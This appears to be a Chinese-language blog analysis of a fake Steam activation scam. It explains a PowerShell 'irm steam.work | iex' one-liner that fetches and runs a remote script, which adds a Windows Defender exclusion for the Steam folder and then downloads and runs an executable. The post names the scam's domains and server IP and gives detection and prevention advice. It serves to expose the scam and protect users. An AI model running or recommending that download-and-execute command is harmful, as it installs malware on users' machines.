Steam假入库流程分析

一、假入库命令分析

假入库命令：irm steam.work | iex

1. irm指令

向指定网站发送请求，并返回信息

irm命令作用

2. iex指令

在本地计算机上执行命令

iex命令作用

3. 整体作用

首先使用irm命令从指定网站获取到命令脚本，通过管道（|）将获取到的命令传递给iex执行。由于使用终端使用管理员权限打开，所以下面的危险命令都会顺利执行。

二、假入库脚本分析

从steamcdk.link获取，steam.work目前已经解析到官网

1. 打印信息

首先通过Write-Host命令打印steam的logo以及名字

打印信息

2. 权限检查

判断当前终端是否使用管理员权限打开，S-1-5-32-544为Windows内置管理员组的SID。如果不是管理员权限打开，则提示用户

终端权限判断

3. 通过查找注册表信息获取到steam安装路径

例如最终获得的steamPath为C:/programs/steam

 

获取steam安装路径

4. 判断Windows Defender状态

如果开启，则将steam路径加入其排除路径，并指定不扫描该路径下的dll与exe文件

检测Defender相关设置

5. 下载病毒文件，并执行

从指定链接下载一个名为“steamworks.exe“的文件，保存到steam安装路径下，并直接执行该文件。涉及到的两个域名下面会展示相关信息。

下载文件

三、Steamworks.exe文件

正版steam安装路径下并不会存在该文件，此程序为盗版假入库的验证程序。通过将商家cdk发送到后台API进行验证，判断该cdk是否正确（自己做的后台，管理并生成盗版cdk，并通过自己的后台进行验证）。之后应该会根据返回结果来欺骗steam来下载游戏，实现假入库。但是本人技术有限，无法对exe文件进行逆向分析。

通过抓包发现，输入盗版cdk之后，该exe文件会向“111.230.239.121“发起一个GET请求。接口为”/cdk.php”，请求参数为”cdk=盗版cdk值进行后台校验”。

WireShark抓包

请求测试接口

四、涉及到的域名

做这种东西居然都用的国内服务器，并且还使用在工信部进行备案过的域名，可以查到两个域名均为企业备案，并可以查询到相应的工商登记信息。

1. Steam.work

假入库脚本请求域名

steam.work ICP备案信息

steam.work 备案主体工商登记信息

2. Haory.cn

假入库文件下载域名

haory.cn ICP备案信息

haory.cn 备案主体工商登记信息

五、检查以及预防

假入库这种方式会在steam安装目录下加入其他文件，如此脚本中下载的“steamworks.exe“，还有部分帖子提到的”hid.dll“。同时可以检查Windows Defender等自己电脑上的安全管理软件是否把steam目录加入了排除扫描目录。

其实只要掌握好管理员权限就不会发生这种情况，正常玩家玩游戏以及官方入库是不会涉及到使用管理员权限的。

Steam入库不需要使用第三方脚本或者软件，直接进入steam从左下角添加游戏->在steam上激活产品。当然，要是找不到这个选项可能你的steam自己也存在问题。

下面两幅图是盗版激活与正版激活的界面，仔细观察也是存在差异的，包括分辨率以及字体、背景颜色等。尤其是正版激活界面不输入cdk，确认按钮不会变蓝色，盗版始终为蓝色。

盗版入库界面

正版入库界面